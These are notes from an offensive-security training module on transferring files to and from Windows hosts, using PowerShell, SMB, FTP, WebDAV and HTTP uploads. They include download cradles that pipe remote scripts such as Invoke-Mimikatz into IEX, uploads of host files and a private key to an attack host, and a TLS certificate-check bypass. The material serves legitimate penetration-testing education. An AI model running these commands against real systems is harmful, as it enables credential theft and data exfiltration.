#readwise
# File Transfers - Windows File Transfer Methods

## Metadata
- Author: [[Hack The Box]]
- Full Title: File Transfers - Windows File Transfer Methods

## Summary
Notes on moving files to and from a Windows host with built-in tooling: downloads with PowerShell (`Net.WebClient`, `Invoke-WebRequest`), SMB and FTP; uploads over HTTP, WebDAV and FTP; a no-network option (base64 pasted through the terminal); and hash checks to confirm that what arrived is what was sent.

## Highlights
### PowerShell Base64 Encode & Decode
Depending on the size of the file we want to transfer, we can use methods that do not require network communication at all. If we have access to a terminal, we can encode a file to a base64 string, copy that string out of the terminal, and perform the reverse operation on the other side, decoding it back into the original file. Let's see how to do this with PowerShell.

An essential step with this method is to confirm that the decoded file is byte-for-byte the file we encoded. On Linux we can use [`md5sum`](https://man7.org/linux/man-pages/man1/md5sum.1.html), which calculates and verifies 128-bit MD5 checksums. MD5 is adequate for catching a corrupted paste; it is not a defence against deliberate tampering, so prefer SHA-256 where that matters.

```sh
md5sum id_rsa
cat id_rsa | base64 -w 0; echo
```

`-w 0` disables line wrapping so the whole encoding arrives as one line that can be copied as a single token; the trailing `echo` just puts the prompt back on its own line.

We can confirm the file was transferred successfully using the [`Get-FileHash`](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/get-filehash?view=powershell-7.2) cmdlet, which with `-Algorithm MD5` produces the same digest that `md5sum` prints (its default is SHA-256, so name the algorithm explicitly when comparing against the Linux side).
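The encode, decode and verify steps wrapped into two PowerShell functions, as an added example (not code from the Hack The Box module). The file paths and the MD5 value in the usage comment are placeholders; the 1 MB warning threshold is an arbitrary assumption about how much text a terminal paste copes with.

```powershell
# Added example, not from the original page: base64 round-trip with an
# integrity check. Encode on the side that has the file, paste the string
# into the other terminal, decode there, then compare hashes before use.

function ConvertTo-Base64File {
    param([Parameter(Mandatory)][string]$Path)
    $full  = (Resolve-Path -LiteralPath $Path).ProviderPath
    $bytes = [IO.File]::ReadAllBytes($full)
    if ($bytes.Length -gt 1MB) {
        # Assumed limit: pasting megabytes through a terminal is unreliable;
        # split the file or use a network method instead.
        Write-Warning "$($bytes.Length) bytes will produce a very long string; consider chunking."
    }
    # One unbroken line, the equivalent of `base64 -w 0` on Linux.
    [Convert]::ToBase64String($bytes)
}

function ConvertFrom-Base64File {
    param(
        [Parameter(Mandatory)][string]$Base64,
        [Parameter(Mandatory)][string]$OutFile,
        [string]$ExpectedMd5    # digest printed by md5sum on the sending side (optional)
    )
    # .NET resolves relative paths against the process working directory, which
    # is not necessarily the PowerShell location, so make the path absolute.
    if (-not [IO.Path]::IsPathRooted($OutFile)) {
        $OutFile = Join-Path (Get-Location).ProviderPath $OutFile
    }
    # Drop any whitespace or line breaks the terminal inserted during the paste.
    $clean = $Base64 -replace '\s', ''
    [IO.File]::WriteAllBytes($OutFile, [Convert]::FromBase64String($clean))

    # Same check as `Get-FileHash ... -Algorithm MD5`; -ne is case-insensitive,
    # so md5sum's lower-case hex compares cleanly against PowerShell's upper-case.
    $actual = (Get-FileHash -LiteralPath $OutFile -Algorithm MD5).Hash
    if ($ExpectedMd5 -and $actual -ne $ExpectedMd5) {
        Remove-Item -LiteralPath $OutFile   # do not leave a corrupt copy behind
        throw "MD5 mismatch for ${OutFile}: expected $ExpectedMd5, got $actual"
    }
    [pscustomobject]@{
        Path  = $OutFile
        Bytes = (Get-Item -LiteralPath $OutFile).Length
        MD5   = $actual
    }
}

# Usage (placeholder paths and digest):
#   Sending side:   $b64 = ConvertTo-Base64File -Path .\id_rsa   # copy $b64 out of the terminal
#   Receiving side: ConvertFrom-Base64File -Base64 $pasted -OutFile C:\Users\Public\id_rsa `
#                       -ExpectedMd5 '4e301756a07ded0a2dd6953abf46d1c0'
```

The decoder deliberately deletes its output on a hash mismatch: a truncated or whitespace-damaged paste still decodes to *some* bytes, and a half-written key file is worse than none.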
---

```powershell
Get-FileHash C:\Users\Public\id_rsa -Algorithm MD5
```

Compare the `Hash` column with the `md5sum` output from the sending side; the case differs, the digest must not.

---

### Downloading Files Using PowerShell
PowerShell offers many file transfer options. In any version of PowerShell, the [System.Net.WebClient](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient?view=net-5.0) class can be used to download a file over `HTTP`, `HTTPS` or `FTP`. The following [table](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient?view=net-6.0) describes the WebClient methods for downloading data from a resource:

| Method | Description |
| --- | --- |
| [OpenRead](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.openread?view=net-6.0) | Returns the data from a resource as a [Stream](https://docs.microsoft.com/en-us/dotnet/api/system.io.stream?view=net-6.0). |
| [OpenReadAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.openreadasync?view=net-6.0) | Returns the data from a resource without blocking the calling thread. |
| [DownloadData](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloaddata?view=net-6.0) | Downloads data from a resource and returns a byte array. |
| [DownloadDataAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloaddataasync?view=net-6.0) | Downloads data from a resource and returns a byte array without blocking the calling thread. |
| [DownloadFile](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-6.0) | Downloads data from a resource to a local file. |
| [DownloadFileAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfileasync?view=net-6.0) | Downloads data from a resource to a local file without blocking the calling thread. |
| [DownloadString](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-6.0) | Downloads a string from a resource and returns it as a String. |
| [DownloadStringAsync](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstringasync?view=net-6.0) | Downloads a string from a resource without blocking the calling thread. |

Of these, `DownloadFile` (writes to disk) and `DownloadString` (keeps the content in memory) are the two that matter for the cradles below.

---

```powershell
(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\Users\Public\Downloads\PowerView.ps1')
```

---

As we previously discussed, fileless attacks use operating system functionality to download a payload and execute it directly, without writing it to disk. PowerShell can do the same: instead of saving a script and then running it, we fetch it as a string and pipe it to the [Invoke-Expression](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2) cmdlet (alias `IEX`), so it executes in memory. "In memory" means no file on disk, not invisible: on PowerShell 5 and later AMSI still inspects the script text handed to `IEX`, and Script Block Logging, where enabled, records it.

---

```powershell
(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') | IEX
```

---

From PowerShell 3.0 onwards, the [Invoke-WebRequest](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2) cmdlet is also available, but it is noticeably slower at downloading files.
You can use the aliases `iwr`, `curl` and `wget` instead of the full `Invoke-WebRequest` name. In Windows PowerShell `curl` and `wget` are therefore the cmdlet, not the Unix tools, so the Unix command-line options do not apply.

---

Harmj0y has compiled an extensive list of PowerShell download cradles [here](https://gist.github.com/HarmJ0y/bb48307ffa663256e239). It is worth gaining familiarity with them and their nuances, such as whether a cradle is proxy-aware or whether it touches disk (writes the file onto the target), in order to select the appropriate one for the situation.

---

There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download. ... This can be bypassed using the parameter `-UseBasicParsing`, which stops `Invoke-WebRequest` from handing the response to the IE DOM parser. PowerShell 6 and later never use the IE engine; there the switch is accepted but has no effect.

---

Another error in PowerShell downloads is related to the SSL/TLS secure channel when the server certificate is not trusted (a self-signed certificate on our attack host, for example). We can bypass that error with the following command, which makes .NET accept any certificate for the rest of the session:

```powershell
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
```

The callback covers `Net.WebClient` and, in Windows PowerShell, `Invoke-WebRequest` as well, since both sit on the same .NET HTTP stack. In PowerShell 6 and later, `Invoke-WebRequest` uses a different stack that ignores this setting; use its `-SkipCertificateCheck` switch instead.

---

### SMB Downloads
The Server Message Block protocol (SMB), which runs on port TCP/445, is common in enterprise networks where Windows services are running. It enables applications and users to transfer files to and from remote servers. We can use SMB to download files from our Pwnbox easily. We need to start an SMB server on our Pwnbox with [smbserver.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbserver.py) from Impacket and then use `copy`, `move`, PowerShell `Copy-Item`, or any other tool that can connect to an SMB share.

```sh
sudo impacket-smbserver share -smb2support /tmp/smbshare
```

---

New versions of Windows block unauthenticated guest access ...

To transfer files in this scenario, we can set a username and password on our Impacket SMB server and mount the share on the Windows target:

```sh
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
```

```powershell
net use n: \\192.168.220.133\share /user:test test
```

---

### FTP Downloads
Another way to transfer files is FTP (File Transfer Protocol), which uses TCP/21 for the control channel and TCP/20 (active mode) or a negotiated high port (passive mode) for data. We can use the FTP client or PowerShell's `Net.WebClient` to download files from an FTP server. We can run an FTP server on our attack host with the Python 3 `pyftpdlib` module.

```sh
sudo python3 -m pyftpdlib --port 21
```

```powershell
(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')
```

---

When we get a shell on a remote machine, we may not have an interactive shell, in which case the `ftp` client cannot be driven by hand. Instead, we create a command file containing the FTP commands we want to run and pass it to the client with `-s:`; `-n` suppresses the automatic login on connect (so our `USER` line is what authenticates) and `-v` suppresses the display of server responses.

`ftpcommand.txt`:
```
open 192.168.49.128
USER anonymous
binary
GET file.txt
bye
```

```powershell
ftp -v -n -s:ftpcommand.txt
```

---

### Uploads using Python Web Server
PowerShell doesn't have a built-in cmdlet for upload operations, but we can use `Invoke-WebRequest` or `Invoke-RestMethod` to build our own upload function. We'll also need a web server that accepts uploads, which is not a default option in most common web server utilities. For our web server, we can use [uploadserver](https://github.com/Densaugeo/uploadserver), an extension of the Python [http.server module](https://docs.python.org/3/library/http.server.html) that includes a file upload page and an `/upload` endpoint for scripted POSTs.
```sh
python3 -m uploadserver
```

---

Now we can use the PowerShell script [PSUpload.ps1](https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1), which uses `Invoke-RestMethod` to perform the upload. The script accepts two parameters: `-File`, the path of the file to send, and `-Uri`, the server URL we upload to. Let's attempt to upload the `hosts` file from our Windows host.

```powershell
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts
```

---

### File Uploads using WebDAV
An alternative to SMB is `WebDAV`, which gives us file-share semantics over HTTP. `WebDAV` [(RFC 4918)](https://datatracker.ietf.org/doc/html/rfc4918) is an extension of HTTP, the protocol web browsers and web servers use to communicate. It lets a web server behave like a file server, supporting collaborative content authoring, and it can also run over HTTPS. This matters on Windows because a UNC path such as `\\host\share` is not tied to SMB: the redirector first tries SMB, and if no SMB share answers (or TCP/445 is filtered on the way out) it falls back to WebDAV over HTTP through the WebClient service, provided that service is running on the target. The reserved share name `DavWWWRoot` (for example `\\192.168.49.128\DavWWWRoot`) skips the SMB attempt and addresses the WebDAV root directly.

---

To set up our WebDAV server, we need to install two Python modules, `wsgidav` and `cheroot` (you can read more about this implementation at the [wsgidav GitHub](https://github.com/mar10/wsgidav)). After installing them, we run `wsgidav` with the directory we want to serve as its root:

```sh
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
```

---

### File Uploads using FTP
Uploading files using FTP is very similar to downloading them. We can use PowerShell or the FTP client to complete the operation. Before starting our FTP server with the Python module `pyftpdlib`, we need to add the `--write` option so that clients are allowed to upload files to our attack host; without it the anonymous share is read-only and the `PUT` is refused.

```sh
sudo python3 -m pyftpdlib --port 21 --write
```

```powershell
(New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')
```

`ftpcommand.txt`:
```
open 192.168.49.128
USER anonymous
binary
PUT c:\windows\system32\drivers\etc\hosts
bye
```

```powershell
ftp -v -n -s:ftpcommand.txt
```

---
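The "Uploads using Python Web Server" section above treats PSUpload.ps1 as a black box. The function below is an added example (not PSUpload.ps1 and not part of uploadserver) that shows what such a script has to do: assemble a `multipart/form-data` body by hand, because Windows PowerShell 5.1 has no `-Form` parameter on `Invoke-RestMethod` (that arrived in PowerShell 6). It assumes a `python3 -m uploadserver` listener whose endpoint is `/upload` and whose form field is named `files`; the host address is a placeholder. The MD5 it returns is for comparison with `md5sum` on the attack host, the same check the base64 section recommends.

```powershell
# Added example, not from the original page or from PSUpload.ps1.
# Assumptions: target endpoint is uploadserver's POST /upload and its form
# field is "files" (override -FieldName if your version differs).

function Send-FileMultipart {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$Uri,     # e.g. http://192.168.49.128:8000/upload (placeholder)
        [Parameter(Mandatory)][string]$Path,
        [string]$FieldName = 'files',           # assumed uploadserver field name
        [switch]$SkipCertificateCheck           # only relevant for https:// targets
    )
    $file  = Get-Item -LiteralPath $Path
    $bytes = [IO.File]::ReadAllBytes($file.FullName)

    # The boundary must never appear inside the payload; a fresh GUID is safe enough.
    $boundary = [Guid]::NewGuid().ToString()
    $crlf = "`r`n"

    $header = "--$boundary$crlf" +
              "Content-Disposition: form-data; name=`"$FieldName`"; filename=`"$($file.Name)`"$crlf" +
              "Content-Type: application/octet-stream$crlf$crlf"
    $footer = "$crlf--$boundary--$crlf"

    # Concatenate header + raw file bytes + footer as BYTES. Building the body as
    # a .NET string and re-encoding it would corrupt any non-text file.
    $ascii = [Text.Encoding]::ASCII          # header/footer are ASCII; non-ASCII filenames need RFC 5987 encoding (not handled here)
    $body  = New-Object IO.MemoryStream
    $h = $ascii.GetBytes($header); $body.Write($h, 0, $h.Length)
    $body.Write($bytes, 0, $bytes.Length)
    $f = $ascii.GetBytes($footer); $body.Write($f, 0, $f.Length)

    if ($SkipCertificateCheck) {
        # Same trick as the ServerCertificateValidationCallback line in the
        # downloads section; note it is process-wide, not scoped to this call.
        [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
    }

    $response = Invoke-RestMethod -Uri $Uri -Method Post `
        -ContentType "multipart/form-data; boundary=$boundary" `
        -Body $body.ToArray() -UseBasicParsing

    # Report what was sent so the copy on the server can be checked with md5sum.
    [pscustomobject]@{
        File     = $file.FullName
        Bytes    = $bytes.Length
        MD5      = (Get-FileHash -LiteralPath $file.FullName -Algorithm MD5).Hash
        Response = $response
    }
}

# Usage (placeholder address):
# Send-FileMultipart -Uri http://192.168.49.128:8000/upload -Path C:\Windows\System32\drivers\etc\hosts
```

Passing a `byte[]` to `-Body` is what keeps the file intact: `Invoke-RestMethod` sends a byte array verbatim, whereas a string body goes through a text encoding step. `-UseBasicParsing` is there for the same reason as in the download section (no IE engine dependency); on PowerShell 6 and later it is harmless and `-SkipCertificateCheck` on the cmdlet itself replaces the callback.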